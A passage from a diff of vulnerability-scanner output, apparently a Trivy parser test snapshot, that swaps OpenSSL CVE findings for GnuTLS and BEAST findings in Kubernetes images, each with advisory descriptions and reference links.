1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT", + "name": "GnuTLS: Null pointer dereference in MD_UPDATE", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3450", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "value": "https://avd.aquasec.com/nvd/cve-2021-4209", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "value": "https://access.redhat.com/security/cve/CVE-2021-4209", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3450", + "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", + "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3450.html", + "value": "https://ubuntu.com/security/notices/USN-5750-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3389", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", + "references": [ + "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", + "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", + "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "http://curl.haxx.se/docs/adv_20120124B.html", + "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "http://ekoparty.org/2011/juliano-rizzo.php", + "http://eprint.iacr.org/2004/111", + "http://eprint.iacr.org/2006/136", + "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "http://osvdb.org/74829", + "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "http://secunia.com/advisories/45791", + "http://secunia.com/advisories/47998", + "http://secunia.com/advisories/48256", + "http://secunia.com/advisories/48692", + "http://secunia.com/advisories/48915", + "http://secunia.com/advisories/48948", + "http://secunia.com/advisories/49198", + "http://secunia.com/advisories/55322", + "http://secunia.com/advisories/55350", + "http://secunia.com/advisories/55351", + "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "http://support.apple.com/kb/HT4999", + "http://support.apple.com/kb/HT5001", + "http://support.apple.com/kb/HT5130", + "http://support.apple.com/kb/HT5281", + "http://support.apple.com/kb/HT5501", + "http://support.apple.com/kb/HT6150", + "http://technet.microsoft.com/security/advisory/2588513", + "http://vnhacker.blogspot.com/2011/09/beast.html", + "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "http://www.debian.org/security/2012/dsa-2398", + "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "http://www.ibm.com/developerworks/java/jdk/alerts/", + "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "http://www.insecure.cl/Beast-SSL.rar", + "http://www.kb.cert.org/vuls/id/864643", + "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "http://www.opera.com/docs/changelogs/mac/1151/", + "http://www.opera.com/docs/changelogs/mac/1160/", + "http://www.opera.com/docs/changelogs/unix/1151/", + "http://www.opera.com/docs/changelogs/unix/1160/", + "http://www.opera.com/docs/changelogs/windows/1151/", + "http://www.opera.com/docs/changelogs/windows/1160/", + "http://www.opera.com/support/kb/view/1004/", + "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "http://www.securityfocus.com/bid/49388", + "http://www.securityfocus.com/bid/49778", + "http://www.securitytracker.com/id/1029190", + "http://www.securitytracker.com/id?1025997", + "http://www.securitytracker.com/id?1026103", + "http://www.securitytracker.com/id?1026704", + "http://www.ubuntu.com/usn/USN-1263-1", + "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "https://access.redhat.com/security/cve/CVE-2011-3389", + "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "https://hermes.opensuse.org/messages/13154861", + "https://hermes.opensuse.org/messages/13155432", + "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "https://linux.oracle.com/cve/CVE-2011-3389.html", + "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "https://ubuntu.com/security/notices/USN-1263-1", + "https://www.cve.org/CVERecord?id=CVE-2011-3389", + ], + }, + "category": "Vulnerability", + "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://avd.aquasec.com/nvd/cve-2011-3389", }, { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", + "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", + "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", + "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "http://curl.haxx.se/docs/adv_20120124B.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "http://ekoparty.org/2011/juliano-rizzo.php", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "http://eprint.iacr.org/2004/111", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3450", + "value": "http://eprint.iacr.org/2006/136", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-08", + "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1l-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3712", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - "https://access.redhat.com/security/cve/CVE-2021-3712", - "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-3712.html", - "https://linux.oracle.com/errata/ELSA-2022-9023.html", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", - "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://ubuntu.com/security/notices/USN-5051-2", - "https://ubuntu.com/security/notices/USN-5051-3", - "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3712", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", - ], - }, - "category": "Vulnerability", - "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: Read buffer overruns processing ASN.1 strings", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3712", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3712", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", + "value": "http://osvdb.org/74829", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "http://secunia.com/advisories/45791", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "value": "http://secunia.com/advisories/47998", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "value": "http://secunia.com/advisories/48256", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "value": "http://secunia.com/advisories/48692", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "value": "http://secunia.com/advisories/48915", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "http://secunia.com/advisories/48948", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "http://secunia.com/advisories/49198", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "http://secunia.com/advisories/55322", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "http://secunia.com/advisories/55350", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-2", + "value": "http://secunia.com/advisories/55351", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-3", + "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "http://support.apple.com/kb/HT4999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "value": "http://support.apple.com/kb/HT5001", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "http://support.apple.com/kb/HT5130", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "http://support.apple.com/kb/HT5281", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "http://support.apple.com/kb/HT5501", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "http://support.apple.com/kb/HT6150", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "http://technet.microsoft.com/security/advisory/2588513", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "http://vnhacker.blogspot.com/2011/09/beast.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-0778", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", - "references": [ - "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "https://access.redhat.com/errata/RHSA-2022:5326", - "https://access.redhat.com/security/cve/CVE-2022-0778", - "https://bugzilla.redhat.com/2062202", - "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - "https://errata.almalinux.org/8/ALSA-2022-5326.html", - "https://errata.rockylinux.org/RLSA-2022:4899", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", - "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", - "https://linux.oracle.com/cve/CVE-2022-0778.html", - "https://linux.oracle.com/errata/ELSA-2022-9272.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", - "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220321-0002/", - "https://security.netapp.com/advisory/ntap-20220429-0005/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5328-1", - "https://ubuntu.com/security/notices/USN-5328-2", - "https://www.cve.org/CVERecord?id=CVE-2022-0778", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220315.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.tenable.com/security/tns-2022-06", - "https://www.tenable.com/security/tns-2022-07", - "https://www.tenable.com/security/tns-2022-08", - "https://www.tenable.com/security/tns-2022-09", - ], - }, - "category": "Vulnerability", - "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0778", + "value": "http://www.debian.org/security/2012/dsa-2398", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "http://www.insecure.cl/Beast-SSL.rar", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5326", + "value": "http://www.kb.cert.org/vuls/id/864643", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0778", + "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2062202", + "value": "http://www.opera.com/docs/changelogs/mac/1151/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "value": "http://www.opera.com/docs/changelogs/mac/1160/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "value": "http://www.opera.com/docs/changelogs/unix/1151/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "value": "http://www.opera.com/docs/changelogs/unix/1160/", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "value": "http://www.opera.com/docs/changelogs/windows/1151/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4899", + "value": "http://www.opera.com/docs/changelogs/windows/1160/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "value": "http://www.opera.com/support/kb/view/1004/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", + "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "http://www.securityfocus.com/bid/49388", }, { "type": "URL", - "value": 